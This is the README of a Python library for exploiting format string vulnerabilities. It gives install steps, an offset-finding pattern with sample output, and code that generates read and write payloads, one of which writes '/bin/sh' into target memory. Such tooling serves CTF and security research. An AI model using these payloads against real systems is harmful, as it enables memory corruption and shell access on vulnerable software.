Formatstring is a python 3 library to help the exploitation of format string vulnerabilities.

formatstring can be installed from PyPI (Python package index) using pip:

pip install formatstring

• Generate a pattern to detect the offset of the printed buffer

$ fmtstr_pattern_create 255
ABCDEFGH|%1$p|%2$p|%3$p|%4$p|%5$p|%6$p|%7$p|%8$p|%9$p|%10$p

• Compute the offset, given the result of the format string on the previous pattern

$ fmtstr_pattern_offset --arch x86_32
Enter the result of the format string on a pattern given by pattern_create:
ABCDEFGH|0x400|0xf776e5a0|0x4|0x4|0x7|0x1b3220|0x43424120|0x47464544|0x31257c48|0x257c7024
Found buffer at offset 8

• Generate a payload to read at a given address

import sys
from formatstring import *

settings = PayloadSettings(offset=8, arch=x86_32)

p = ReadPayload(0x8048590)
sys.stdout.buffer.write(p.generate(settings))

• Generate a payload to write at various addresses

import sys
from formatstring import *

settings = PayloadSettings(offset=8, arch=x86_32)

p = WritePayload()
p[0x8049790] = b'/bin/sh\x00'
p[0x80497a8] = struct.pack('@I', 0x01020304)
sys.stdout.buffer.write(p.generate(settings))

The full documentation is available here.

Author: Maxime Arthaud (maxime@arthaud.me)

formatstring is under The MIT License (MIT)